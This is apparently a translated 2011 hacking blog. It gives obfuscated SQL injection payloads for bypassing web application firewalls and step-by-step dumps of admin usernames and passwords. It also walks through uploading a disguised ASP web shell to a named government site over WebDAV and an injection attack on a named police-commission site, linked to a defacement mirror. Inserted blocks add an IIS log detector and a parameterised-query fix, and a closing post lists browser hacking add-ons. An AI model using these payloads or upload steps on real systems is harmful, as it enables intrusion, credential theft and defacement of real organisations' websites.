13 October 2011

WAF Bypass (SQLi)


A WAF is a Web Application Firewall used to filter malicious requests or keywords on our website. Is a WAF a safe way to protect my website? It depends on your application: even if our website is protected by a WAF, nothing is 100% secure.

Injectors use many methods to bypass the WAF's protection,
namely commands that slip past the WAF's blocking.

Examples of such commands are:

Code : //, -- , /**/, #, --+, -- -, ;

1. Inline Comments

code : id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()-- -
 

2. Buffer Overflow / Unexpected input:

code : id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA 1000 more A's)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--+


3. Replaced keywords (preg_replace and/or WAFs with the same action):

code : id=1+UNIunionON+SeLselectECT+1,2,3--

4. Character encoding:

code : id=1%252f%252a*/UNION%252f%252a*/SELECT%252f%252a*/1,2,password%252f%252a*/FROM%252f%252a*/Users--+


-------------------------------------------------


OK. Here are example attacks for bypassing the WAF ..

1. The ORDER BY column command:

index.php?id=1 order by 10-- Error
index.php?id=1 order by 9-- Error
index.php?id=1 order by 8-- Error
index.php?id=1 order by 7-- Error
index.php?id=1 order by 6-- Error
index.php?id=1 order by 5-- True


or :
index.php?id=1/**/order/**/by/**/10/*
index.php?id=1/**/order/**/by/**/9/*
index.php?id=1/**/order/**/by/**/8/*
index.php?id=1/**/order/**/by/**/7/*
index.php?id=1/**/order/**/by/**/6/*
index.php?id=1/**/order/**/by/**/5/*


2. The valid string command:

index.php?id=-1 union select 1,2,3,4,5--
index.php?id=-1/**/union/**/select/**/1,2,3,4,5--
index.php?id=-1+un/**/ion+sel/**/ect+1,2,3--
index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,2,3,4,5--


or :
 

index.php?id=-1/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,3--

3. User, version, data directory, etc.:


index.php?id=-1 union select 1,2,database(),4,5--
index.php?id=-1 union select 1,2,user(),4,5--
index.php?id=-1 union select 1,2,version(),4,5--
index.php?id=-1 union select 1,2,@@datadir,4,5--


How to combine them:

index.php?id=-1 union select 1,2,group_concat(database(),0x3a,user(),0x3a,version()),4,5--


4. View all tables:

index.php?id=-1 union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=database()--

index.php?id=-1/**/union/**/select/**/1,2,group_concat(table_name),4,5/**/from/**/information_schema.tables/**/where/**/table_schema=database()--

index.php?id=-1+UNION+SELECT+1,2,GROUP_CONCAT(TABLE_NAME),4,5+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--

index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,2,GrOUp_COnCaT(TABLE_NAME),4,5+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--
 

5. View all databases:

index.php?id=-1+UNION+SELECT+1,2,GROUP_CONCAT(SCHEMA_NAME),4,5+FROM+INFORMATION_SCHEMA.SCHEMATA--
or:

index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(SCHEMA_NAME),4,5+FROM+INFORMATION_SCHEMA.SCHEMATA--


6. Now we look at the columns of the table we want:

index.php?id=-1 union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=0x61646d696e

index.php?id=-1/**/ union/**/select/**/1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=0x61646d696e

index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,2,GROUP_CONCAT(COLUMN_NAME),4,5+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x61646d696e

index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,2,GrOUp_COnCaT(COLUMN_NAME),4,5+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x61646d696e
 

7. Final step:

index.php?id=-1 union select 1,2,group_concat(user,0x3a,password),4,5 from admin--

index.php?id=-1/**/union/**/select/**/1,2,group_concat(user,0x3a,password),4,5 from admin--

index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,2,GrOUp_COnCaT(user,0x3a,password,0x3a,email),3,4,5+FROM+admin--

index.php?id=-1+un/**/ion+sel/**/ect+1,2,GrOUp_COnCaT(user,0x3a,password,0x3a,email),3,4,5+FROM+admin--



For a proof of concept, friends, please develop this yourselves when doing injection.
But I will also write a tutorial for the proof of concept later.

Regards ..



09 October 2011

Acunetix Webdav on pu.go.id


What is this WebDAV vulnerability? Just search Google.. haha
But literally, WebDAV is a very vulnerable component of IIS servers.
Let's try scanning the website pu.go.id with Acunetix, and I got a WebDAV vulnerability in pu.go.id. Or you can use DAVtest.



Look for a directory that is writable (where we can insert files, etc.). Example = www.localhost.com, www.localhost.com/images, etc.

Open Windows Explorer; my PC uses Windows 7 :p


Right-click Computer and choose Add a network location

Just click Next .. Next.. bro.
Remember.. if the main domain doesn't work, look for a directory that allows us to insert files, according to the Acunetix scan results.


After that, just Next .. Next ..

Prepare shell.asp, then copy-paste our shell to the victim website's folder :D
Don't forget to rename our shell to: shell.asp.;jpg or shell.asp.;txt
But we can also insert files: .txt, html, htm, etc.
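From the defender's side, everything in the walkthrough above leaves a trace in the IIS log: an OPTIONS probe from the Windows WebDAV redirector, a PUT or MOVE that the server answered 201, and a file name with an executable extension buried before a ";" or a second extension. The script below is an added example (not part of the post, and not a real product's rule set) that parses an IIS W3C log using its #Fields header and raises a finding for WebDAV write methods and for masked executable names. The log excerpt, IP addresses and user-agent strings are constructed sample data; the method and extension lists are my assumptions.

```python
import re
from dataclasses import dataclass, field

# Constructed IIS W3C log excerpt (sample data, not from any real server)
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2011-10-09 10:01:02 10.0.0.5 GET /images/logo.gif - 80 - 198.51.100.7 Mozilla/5.0 200 0 0
2011-10-09 10:01:09 10.0.0.5 OPTIONS / - 80 - 198.51.100.7 Microsoft-WebDAV-MiniRedir/6.1.7601 200 0 0
2011-10-09 10:01:15 10.0.0.5 PUT /images/shell.asp.;jpg - 80 - 198.51.100.7 Microsoft-WebDAV-MiniRedir/6.1.7601 201 0 0
2011-10-09 10:01:20 10.0.0.5 MOVE /images/shell.asp.;jpg - 80 - 198.51.100.7 Microsoft-WebDAV-MiniRedir/6.1.7601 201 0 0
2011-10-09 10:02:01 10.0.0.5 GET /images/shell.asp.;jpg - 80 - 203.0.113.9 Mozilla/5.0 200 0 0
2011-10-09 10:03:00 10.0.0.5 PUT /notes/readme.txt - 80 - 198.51.100.7 Microsoft-WebDAV-MiniRedir/6.1.7601 201 0 0
2011-10-09 10:04:00 10.0.0.5 GET /default.asp - 80 - 203.0.113.9 Mozilla/5.0 200 0 0
"""

# WebDAV methods that change content on the server; anonymous clients should never get these
WRITE_METHODS = {"PUT", "MOVE", "COPY", "MKCOL", "PROPPATCH", "DELETE", "LOCK", "UNLOCK"}
# An executable extension that is *not* the final extension (shell.asp.;jpg, x.asp;.txt)
MASKED_EXEC = re.compile(r"\.(asp|aspx|asa|cer|cdx|ashx)[.;]", re.I)


@dataclass
class Finding:
    line_no: int
    client: str
    method: str
    path: str
    status: str
    reasons: list = field(default_factory=list)


def parse_iis_log(text):
    """Yield (line_no, record dict) using the #Fields header to name the columns."""
    fields = None
    for line_no, line in enumerate(text.splitlines(), 1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed line; a real pipeline would count these
        yield line_no, dict(zip(fields, parts))


def analyse(text):
    """Flag write methods and masked executable names; returns a list of Finding."""
    findings = []
    for line_no, rec in parse_iis_log(text):
        reasons = []
        if rec["cs-method"].upper() in WRITE_METHODS:
            reasons.append("webdav_write")
        if MASKED_EXEC.search(rec["cs-uri-stem"]):
            reasons.append("masked_executable")
        if reasons:
            findings.append(Finding(line_no, rec["c-ip"], rec["cs-method"],
                                    rec["cs-uri-stem"], rec["sc-status"], reasons))
    return findings


def successful_writes(findings):
    """Writes the server accepted (2xx): the ones that need incident follow-up."""
    return [f for f in findings if "webdav_write" in f.reasons and f.status.startswith("2")]


if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.client} {f.method} {f.path} -> {f.status} {f.reasons}")
```

The later GET of the uploaded file from a different address is flagged only by its name, which is the signal you would pivot on when the upload itself happened before log retention started. The fix for the underlying condition is configuration, not detection: disable the WebDAV module where it is not needed, and where it is, deny the write methods to anonymous users and keep the content directory free of script execution permissions.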
----------------------------------------------- 

Mirror site in Zone-H



SQLi On Komisi Kepolisian



My actions are not meant to cause damage, but purely as a learning medium. Why?
The goal is that the security of our country's websites gets improved further.
Once again I apologise if there are mistakes here. Let's start, dude:

#[0x3a]. Check for the SQL injection vuln

http://www.komisikepolisianindonesia.com/secondPg.php?cat=video&view=34'

secondPg.php?cat=video&view=34 order 1-- false
secondPg.php?cat=video&view=34 order 2-- false
secondPg.php?cat=video&view=34 order 3-- false
secondPg.php?cat=video&view=34 order 4-- false
secondPg.php?cat=video&view=34 order 5-- false
secondPg.php?cat=video&view=34 order 6-- false
secondPg.php?cat=video&view=34 order 7-- false
secondPg.php?cat=video&view=34 order 8-- false
secondPg.php?cat=video&view=34 order 9-- false
secondPg.php?cat=video&view=34 order 10-- true

---> We've got the point to inject !

#[0x3b]. Check the database version:

secondPg.php?cat=video&view=-134+union+all+select+1,2,3,4,5,6,7,8,9--

we've got a lucky number "2"

secondPg.php?cat=video&view=-134+union+all+select+1,version(),3,4,5,6,7,8,9--

- If version 5.0 = you're lucky :D
- If version 4.0 = you're dead :( [that's blind] hahaha ...

#[0x3c]. Table & column

secondPg.php?cat=video&view=-134+union+all+select+1,group_concat(table_name),3,4,5,6,7,8,9+from+information_schema.tables +where+table_schema=database()--

secondPg.php?cat=video&view=-134+union+all+select+1,group_concat(column_name),3,4,5,6,7,8,9+from+information_schema.columns +where+table_schema=database()--

Just switch

(table_name) --> (column_name)
from+information_schema.tables ---> from+information_schema.columns

Finally :

http://www.komisikepolisianindonesia.com/secondPg.php?cat=video&view=-134+union+all+select+1,group_concat(admin_id,0x3a,admin_password),3,4,5,6,7,8,9+from+inweb_admin--
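Both this walkthrough and the seven steps in the WAF Bypass post above rely on one root cause: the view= (or id=) value is pasted into the SQL string, so "-134 union all select ..." becomes part of the query. The example below is added here (it is not the site's code or the post's) and puts the vulnerable lookup beside the parameterised one in a throwaway SQLite database, so you can watch the same payload pull a row out of the admin table from one and get nothing from the other. The tables, rows and hash value are constructed sample data, and the payload uses SQLite's || concatenation where the post uses MySQL's 0x3a.

```python
import sqlite3

# Constructed payload in the shape both posts use (group_concat of user and password);
# SQLite needs || for concatenation where MySQL would accept 0x3a
UNION_PAYLOAD = "-1 union select 1,group_concat(user || ':' || password),3 from admin--"


def make_db():
    """In-memory stand-in for the videos/admin tables (constructed sample data)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE videos(id INTEGER, title TEXT, url TEXT);
        INSERT INTO videos VALUES (34, 'Press briefing', '/v/34.mp4');
        CREATE TABLE admin(user TEXT, password TEXT);
        INSERT INTO admin VALUES ('admin', '$2y$10$constructed-hash');
    """)
    return con


def lookup_vulnerable(con, view):
    """String concatenation: the pattern behind secondPg.php?view=... in the post."""
    sql = "SELECT id, title, url FROM videos WHERE id = " + view
    return con.execute(sql).fetchall()


def lookup_safe(con, view):
    """Validate the type, then bind the value; the parameter is never parsed as SQL."""
    try:
        view_id = int(view)
    except (TypeError, ValueError):
        return []  # not a number: nothing to look up, nothing to leak
    return con.execute(
        "SELECT id, title, url FROM videos WHERE id = ?", (view_id,)
    ).fetchall()


if __name__ == "__main__":
    con = make_db()
    for label, fn in (("vulnerable", lookup_vulnerable), ("safe", lookup_safe)):
        print(label, "normal :", fn(con, "34"))
        print(label, "payload:", fn(con, UNION_PAYLOAD))
```

The "order by N" probe from step 1 of the earlier post is rejected by lookup_safe the same way, because "34 order by 3" is not an integer; with the bound query there is no column count to discover and no error text to read. In a PHP/MySQL application the equivalent is a prepared statement (PDO or mysqli) with the value bound as an integer, plus a generic error page so that syntax errors never reach the browser.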
---------------------------------------------------------------

Mirror Deface :

http://indonesiandefacer.org/mirror/2011/10/komisikepolisianindonesia.html




01 October 2011

Add Ons For Hacking


Everyone surely knows about add-ons already: yes, the .xpi applications that accompany our browser, in other words applications for the browser rather than for the desktop. The following are add-ons that are widely used to help in the hacking process.
1. Adblock Plus
Adblock Plus allows you to regain control of the internet and view the web the way you want to.

2. Greasemonkey
Allows you to customize the way a web page displays or behaves, by using small bits of JavaScript.

3. NoScript
It allows JavaScript, Java and other executable content to run only from trusted domains of your choice, e.g. your home-banking web site, guarding your "trust boundaries" against cross-site scripting attacks (XSS), cross-zone DNS rebinding / CSRF attacks (router hacking), and Clickjacking attempts.

4. Firebug
You can edit, debug, and monitor CSS, HTML, and JavaScript live in any web page.

5. Tamper Data
Use Tamper Data to view and modify HTTP/HTTPS headers and post parameters.

6. Same as Tamper Data

7. HackBar
This toolbar will help you in testing SQL injections, XSS holes and site security.

8. Server Spy
Server Spy indicates what brand of HTTP server (e.g. Apache, IIS, etc.) runs on the visited sites. When a tab is selected, the corresponding server name is shown on the right-hand side of the browser's status bar.

9. SQL Inject Me
SQL Inject Me is the Exploit-Me tool used to test for SQL Injection vulnerabilities.

10. XSS Me
XSS-Me is the Exploit-Me tool used to test for reflected Cross-Site Scripting (XSS).

11. ShowIP
Show the IP address(es) of the current page in the status bar. It also allows querying custom information services by IP (right click) and hostname (left click), like whois, netcraft, etc.

12. This plugin lets you search the Offensive Security Exploit Database. It has been tested using Mozilla Firefox 3.5.5 (on Linux and Windows).

13. This plugin lets you search the Packet Storm - www.packetstormsecurity.org - database. Packet Storm offers an abundant resource of up-to-date and historical security tools, exploits, and advisories.